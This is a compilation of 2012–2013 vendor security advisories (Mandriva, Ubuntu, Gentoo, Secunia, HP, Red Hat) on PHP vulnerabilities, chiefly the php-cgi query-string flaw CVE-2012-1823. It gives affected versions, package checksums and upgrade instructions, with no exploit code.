75c0847b9bfff7a4ecf5f5097e39b5e0 2011/SRPMS/php-5.3.13-0.1.src.rpm daa6819e438adce22445ffb6f25c10f0 2011/SRPMS/php-ini-5.3.13-0.1.src.rpm Mandriva Linux 2011/X86_64: 6f1b882d07cd219f673c90396542719e 2011/x86_64/apache-mod_php-5.3.13-0.1-mdv2011.0.x86_64.rpm 11c80f46a5669769a85ef8f391d07a70 2011/x86_64/lib64php5_common5-5.3.13-0.1-mdv2011.0.x86_64.rpm 7e4e71c5b17031412c13ea2d9b2477c5 2011/x86_64/php-bcmath-5.3.13-0.1-mdv2011.0.x86_64.rpm 528be2af28cf1a4843850e1b565c3898 2011/x86_64/php-bz2-5.3.13-0.1-mdv2011.0.x86_64.rpm 39b482e7037283b454056f4882d5917b 2011/x86_64/php-calendar-5.3.13-0.1-mdv2011.0.x86_64.rpm 9829b1d862405439321b3ecbfb4c7ea1 2011/x86_64/php-cgi-5.3.13-0.1-mdv2011.0.x86_64.rpm 5e705973df7b6c201fabeb2c75d3a74a 2011/x86_64/php-cli-5.3.13-0.1-mdv2011.0.x86_64.rpm eb3b69da40fb3992024aa0a9fea15a8d 2011/x86_64/php-ctype-5.3.13-0.1-mdv2011.0.x86_64.rpm a7fd1763425d19677b6adc88a835770f 2011/x86_64/php-curl-5.3.13-0.1-mdv2011.0.x86_64.rpm 0a4712efbe6fd4e1d2590842f620982c 2011/x86_64/php-dba-5.3.13-0.1-mdv2011.0.x86_64.rpm ca749d3257f0bb0595a6495816d17c29 2011/x86_64/php-devel-5.3.13-0.1-mdv2011.0.x86_64.rpm 56a0d712c402bcddcaba739f35ea07a6 2011/x86_64/php-doc-5.3.13-0.1-mdv2011.0.x86_64.rpm 2a6cf45b3a94ae3e571e3dbcbbc08804 2011/x86_64/php-dom-5.3.13-0.1-mdv2011.0.x86_64.rpm 0f109c681babe75db077f8d9af926f85 2011/x86_64/php-enchant-5.3.13-0.1-mdv2011.0.x86_64.rpm 7d419c4fd0f8180bb777b4b198dbf192 2011/x86_64/php-exif-5.3.13-0.1-mdv2011.0.x86_64.rpm befa5de9e5e4a3a2ab04a4899a0c654e 2011/x86_64/php-fileinfo-5.3.13-0.1-mdv2011.0.x86_64.rpm ef19b2adb8544747b6dbc673d5b758cd 2011/x86_64/php-filter-5.3.13-0.1-mdv2011.0.x86_64.rpm 42952a220d307fab9e88012a0db43ecd 2011/x86_64/php-fpm-5.3.13-0.1-mdv2011.0.x86_64.rpm 40c04426bafdec1b7ac6efd7e80112e3 2011/x86_64/php-ftp-5.3.13-0.1-mdv2011.0.x86_64.rpm 4fb018ed2383c082d45e4b75a346d588 2011/x86_64/php-gd-5.3.13-0.1-mdv2011.0.x86_64.rpm 7237c26a2db73c6a115fc4e035ecb0f2 2011/x86_64/php-gettext-5.3.13-0.1-mdv2011.0.x86_64.rpm 1a474b43b899509ba9516fa042fe1ddd 2011/x86_64/php-gmp-5.3.13-0.1-mdv2011.0.x86_64.rpm 28e8e4748273a5ccaeb65b54d666402f 2011/x86_64/php-hash-5.3.13-0.1-mdv2011.0.x86_64.rpm d3f5e9dfc04ce0ad319884c2501529c4 2011/x86_64/php-iconv-5.3.13-0.1-mdv2011.0.x86_64.rpm c166f30d0bab63ab66c91fdc7f23109e 2011/x86_64/php-imap-5.3.13-0.1-mdv2011.0.x86_64.rpm c2a6c0df9bdb831fa633b00afe1656ca 2011/x86_64/php-ini-5.3.13-0.1-mdv2011.0.x86_64.rpm 8ef06e0d3bc50c6af030273db341f33f 2011/x86_64/php-intl-5.3.13-0.1-mdv2011.0.x86_64.rpm 5e59fb195dd577622ba638e6f61301ce 2011/x86_64/php-json-5.3.13-0.1-mdv2011.0.x86_64.rpm 51d4d134118097c396fd9ae22658fd95 2011/x86_64/php-ldap-5.3.13-0.1-mdv2011.0.x86_64.rpm 43089444e735a7fb955f4b2073a89b8e 2011/x86_64/php-mbstring-5.3.13-0.1-mdv2011.0.x86_64.rpm 67cb0bb2abf2ac499616a9f6b67e42a4 2011/x86_64/php-mcrypt-5.3.13-0.1-mdv2011.0.x86_64.rpm 6167541236c972e1b3ca07ab4e3aa435 2011/x86_64/php-mssql-5.3.13-0.1-mdv2011.0.x86_64.rpm 8169e0c8a9121ed5b088e50f729a08f2 2011/x86_64/php-mysql-5.3.13-0.1-mdv2011.0.x86_64.rpm a9f88ce7ae03e6c9614bbbe77badd211 2011/x86_64/php-mysqli-5.3.13-0.1-mdv2011.0.x86_64.rpm 09ffa27ee341ea0f316c001302dc6b4f 2011/x86_64/php-mysqlnd-5.3.13-0.1-mdv2011.0.x86_64.rpm 52eca2dca4ad432fdb9ca2a42f8af637 2011/x86_64/php-odbc-5.3.13-0.1-mdv2011.0.x86_64.rpm f6e46b6f5ad8a961cbfde8b8e767054a 2011/x86_64/php-openssl-5.3.13-0.1-mdv2011.0.x86_64.rpm 3dd5efd7a83830669edf081f84a6ddd0 2011/x86_64/php-pcntl-5.3.13-0.1-mdv2011.0.x86_64.rpm f000fb58640165fa93eb8939c88f51b9 2011/x86_64/php-pdo-5.3.13-0.1-mdv2011.0.x86_64.rpm e91e95bb78ee4ccc6edc8a676cf83331 2011/x86_64/php-pdo_dblib-5.3.13-0.1-mdv2011.0.x86_64.rpm 82ca0b0fa4daa2d13d351f57cac4b1ad 2011/x86_64/php-pdo_mysql-5.3.13-0.1-mdv2011.0.x86_64.rpm 2a2e4cf2e7b3d6c718072e34bbf1f4d5 2011/x86_64/php-pdo_odbc-5.3.13-0.1-mdv2011.0.x86_64.rpm bae3bd360ca8da31e3444555b1ba5984 2011/x86_64/php-pdo_pgsql-5.3.13-0.1-mdv2011.0.x86_64.rpm 265ffe4fec20f1a276a4ae598f897097 2011/x86_64/php-pdo_sqlite-5.3.13-0.1-mdv2011.0.x86_64.rpm de5791ef4c4f09caf289efcc2946bd40 2011/x86_64/php-pgsql-5.3.13-0.1-mdv2011.0.x86_64.rpm 3e5a5c8d71d73d792f6a9c5d1d1ff0e0 2011/x86_64/php-phar-5.3.13-0.1-mdv2011.0.x86_64.rpm 1b106b0000d8cf09217a8c6066a08abe 2011/x86_64/php-posix-5.3.13-0.1-mdv2011.0.x86_64.rpm 4142e252a6e80033b49966678333d4fc 2011/x86_64/php-pspell-5.3.13-0.1-mdv2011.0.x86_64.rpm 2eaa627598b484e870a745dfce89561c 2011/x86_64/php-readline-5.3.13-0.1-mdv2011.0.x86_64.rpm 16aa5e0d0038dad164fd251584267b25 2011/x86_64/php-recode-5.3.13-0.1-mdv2011.0.x86_64.rpm 1f2221028312e63a8fe0153b0f37268d 2011/x86_64/php-session-5.3.13-0.1-mdv2011.0.x86_64.rpm 08339bda25dfc15853d8f4f3093906b5 2011/x86_64/php-shmop-5.3.13-0.1-mdv2011.0.x86_64.rpm af74d89511d56956fd18f47588c8134a 2011/x86_64/php-snmp-5.3.13-0.1-mdv2011.0.x86_64.rpm a60760ee2c728bcd933f7f129918e20f 2011/x86_64/php-soap-5.3.13-0.1-mdv2011.0.x86_64.rpm 23edc8e373f493137a741d3f5b8a776f 2011/x86_64/php-sockets-5.3.13-0.1-mdv2011.0.x86_64.rpm 0ee3559a3748ba690ee5c4f99a324b1e 2011/x86_64/php-sqlite3-5.3.13-0.1-mdv2011.0.x86_64.rpm a4b3e977bffee9f122cb6e9582edb3f1 2011/x86_64/php-sqlite-5.3.13-0.1-mdv2011.0.x86_64.rpm edcf9dd12733f50cc808a336b26e0fe2 2011/x86_64/php-sybase_ct-5.3.13-0.1-mdv2011.0.x86_64.rpm d6cd75e157f0b6b026444a1407cf90a7 2011/x86_64/php-sysvmsg-5.3.13-0.1-mdv2011.0.x86_64.rpm 0c283bd1ae67f256a6e776f35e36b30c 2011/x86_64/php-sysvsem-5.3.13-0.1-mdv2011.0.x86_64.rpm 85f7cb718011e2ff913ce142a12a6343 2011/x86_64/php-sysvshm-5.3.13-0.1-mdv2011.0.x86_64.rpm 63b205689a9cb3929379ce8c6415fecc 2011/x86_64/php-tidy-5.3.13-0.1-mdv2011.0.x86_64.rpm addd08fffff1581bfa703aeba53c5566 2011/x86_64/php-tokenizer-5.3.13-0.1-mdv2011.0.x86_64.rpm 138500dc24f46346ae847fc2f56ca7a7 2011/x86_64/php-wddx-5.3.13-0.1-mdv2011.0.x86_64.rpm 27801c8421becc9030eb1e2e06342efe 2011/x86_64/php-xml-5.3.13-0.1-mdv2011.0.x86_64.rpm 1fefd162d7a627212ccca1ecda6ccdf2 2011/x86_64/php-xmlreader-5.3.13-0.1-mdv2011.0.x86_64.rpm 2e6d1bbc2319425bfe20b189f4fe4b79 2011/x86_64/php-xmlrpc-5.3.13-0.1-mdv2011.0.x86_64.rpm 421888369bc51fcfcb7a0fcedb23e3e4 2011/x86_64/php-xmlwriter-5.3.13-0.1-mdv2011.0.x86_64.rpm f5d79e3adf80fadf2f185db98ec3b142 2011/x86_64/php-xsl-5.3.13-0.1-mdv2011.0.x86_64.rpm e126fa1b8d8f0a7c18bae56a00345299 2011/x86_64/php-zip-5.3.13-0.1-mdv2011.0.x86_64.rpm a8492adb1cc9cd92d2771d151161ac2e 2011/x86_64/php-zlib-5.3.13-0.1-mdv2011.0.x86_64.rpm 43577b68968398f3e83bbb150c2ba4dd 2011/SRPMS/apache-mod_php-5.3.13-0.1.src.rpm 75c0847b9bfff7a4ecf5f5097e39b5e0 2011/SRPMS/php-5.3.13-0.1.src.rpm daa6819e438adce22445ffb6f25c10f0 2011/SRPMS/php-ini-5.3.13-0.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPq4WAmqjQ0CJFipgRAihWAKCc3667vbSD/ihxb7LB9g9x2C+bnQCg89XH JTVUFGYH3hR84ZM7EV65I9g= =hQaF -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ============================================================================ Ubuntu Security Notice USN-1481-1 June 19, 2012 php5 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Several security issues were fixed in PHP. Software Description: - php5: HTML-embedded scripting language interpreter Details: It was discovered that PHP incorrectly handled certain Tidy::diagnose operations on invalid objects. A remote attacker could use this flaw to cause PHP to crash, leading to a denial of service. (CVE-2012-0781) It was discovered that PHP incorrectly handled certain multi-file upload filenames. A remote attacker could use this flaw to cause a denial of service, or to perform a directory traversal attack. (CVE-2012-1172) Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain Unicode characters in passwords passed to the crypt() function. A remote attacker could possibly use this flaw to bypass authentication. (CVE-2012-2143) It was discovered that a Debian/Ubuntu specific patch caused PHP to incorrectly handle empty salt strings. A remote attacker could possibly use this flaw to bypass authentication. This issue only affected Ubuntu 10.04 LTS and Ubuntu 11.04. (CVE-2012-2317) It was discovered that PHP, when used as a stand alone CGI processor for the Apache Web Server, did not properly parse and filter query strings. Configurations using mod_php5 and FastCGI were not vulnerable. (CVE-2012-2335, CVE-2012-2336) Alexander Gavrun discovered that the PHP Phar extension incorrectly handled certain malformed TAR files. (CVE-2012-2386) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: php5 5.3.10-1ubuntu3.2 Ubuntu 11.10: php5 5.3.6-13ubuntu3.8 Ubuntu 11.04: php5 5.3.5-1ubuntu7.10 Ubuntu 10.04 LTS: php5 5.3.2-1ubuntu4.17 Ubuntu 8.04 LTS: php5 5.2.4-2ubuntu5.25 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1481-1 CVE-2012-0781, CVE-2012-1172, CVE-2012-2143, CVE-2012-2317, CVE-2012-2335, CVE-2012-2336, CVE-2012-2386 Package Information: https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.2 https://launchpad.net/ubuntu/+source/php5/5.3.6-13ubuntu3.8 https://launchpad.net/ubuntu/+source/php5/5.3.5-1ubuntu7.10 https://launchpad.net/ubuntu/+source/php5/5.3.2-1ubuntu4.17 https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.25

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: September 24, 2012 Bugs: #384301, #396311, #396533, #399247, #399567, #399573, #401997, #410957, #414553, #421489, #427354, #429630 ID: 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in PHP, the worst of which lead to remote execution of arbitrary code. Background ========== PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/php < 5.3.15 >= 5.3.15 < 5.4.5 >= 5.4.5 ------------------------------------------------------------------- # Package 1 only applies to users of these architectures: arm Description =========== Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All PHP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15" All PHP users on ARM should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5" References ========== [ 1 ] CVE-2011-1398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398 [ 2 ] CVE-2011-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379 [ 3 ] CVE-2011-4566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566 [ 4 ] CVE-2011-4885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885 [ 5 ] CVE-2012-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057 [ 6 ] CVE-2012-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788 [ 7 ] CVE-2012-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789 [ 8 ] CVE-2012-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830 [ 9 ] CVE-2012-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831 [ 10 ] CVE-2012-1172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172 [ 11 ] CVE-2012-1823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823 [ 12 ] CVE-2012-2143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143 [ 13 ] CVE-2012-2311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311 [ 14 ] CVE-2012-2335 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335 [ 15 ] CVE-2012-2336 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336 [ 16 ] CVE-2012-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386 [ 17 ] CVE-2012-2688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688 [ 18 ] CVE-2012-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365 [ 19 ] CVE-2012-3450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201209-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please refer to the following Mandriva advisories for further information: MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180, MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPq6gTmqjQ0CJFipgRAqvVAJ9zEwWjj1SD2W0x+6Nb/vNvjYO4oQCg6O6L wF916W6TuFcSv/gD10fMyoE= =Va72 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: PHP PHP-CGI QUERY_STRING Parameter Vulnerability SECUNIA ADVISORY ID: SA49014 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49014/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49014 RELEASE DATE: 2012-05-04 DISCUSS ADVISORY: http://secunia.com/advisories/49014/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49014/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49014 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: De Eindbazen has reported a vulnerability in PHP, which can be exploited by malicious people to disclose certain sensitive information or compromise a vulnerable system. The vulnerability is caused due to an error when parsing certain QUERY_STRING parameters. This can be exploited to e.g. The vulnerability is reported in versions 5.3.12 and prior and versions 5.4.2 and prior. SOLUTION: Apply patch or workaround. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: De Eindbazen ORIGINAL ADVISORY: PHP: https://bugs.php.net/bug.php?id=61910 De Eindbazen: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ US-CERT VU#520827: http://www.kb.cert.org/vuls/id/520827 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . This fixes a vulnerability, which can be exploited by malicious people to disclose certain sensitive information or compromise a vulnerable system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03360041 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03360041 Version: 2 HPSBMU02786 SSRT100877 rev.2 - HP System Management Homepage (SMH) Running on Linux, Windows, and VMware ESX, Remote Unauthorized Access, Disclosure of Information, Data Modification, Denial of Service (DoS), Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-05-08 Last Updated: 2013-05-08 Potential Security Impact: Remote unauthorized access, disclosure of information, data modification, Denial of Service (DoS), execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux, Windows, and VMware ESX. The vulnerabilities could be exploited remotely resulting in unauthorized access, disclosure of information, data modification, Denial of Service (DoS), and execution of arbitrary code. References: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379, CVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317, CVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885, CVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053, CVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823,CVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS), CVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege Elevation), CVE-2012-2016 (Information disclosure) SSRT100336, SSRT100753, SSRT100669, SSRT100676, SSRT100695, SSRT100714, SSRT100760, SSRT100786, SSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) before v7.1.1 running on Linux, Windows and VMware ESX. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7 CVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8 CVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5 CVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4 CVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 CVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided HP System Management Homepage v7.1.1 to resolve the vulnerabilities. HP System Management Homepage v7.1.1 or subsequent is available for the following platforms: Product/Platform HP System Management Homepage for Windows x64 HP System Management Homepage for Windows x86 HP System Management Homepage for Linux (AMD64/EM64T) HP System Management Homepage for Linux (x86) HP Management Agents for VMware ESX 4.x Version 9.1.0(A) or subsequent Available from: http://www.hp.com/swpublishing/MTX-ac3d1f80b8dd48b792bfc01a08 HISTORY Version:1 (rev.1) - 26 June 2012 Initial release Version:2 (rev.2) - 8 May 2013 Added SMH Management Agents for VMware ESX to product updates and removed broken URL links Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: php security update Advisory ID: RHSA-2012:0546-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0546.html Issue date: 2012-05-07 CVE Names: CVE-2012-1823 ===================================================================== 1. Summary: Updated php packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. (CVE-2012-1823) Red Hat is aware that a public exploit for this issue is available that allows remote code execution in affected PHP CGI configurations. This flaw does not affect the default configuration in Red Hat Enterprise Linux 5 and 6 using the PHP module for Apache httpd to handle PHP scripts. All php users should upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at 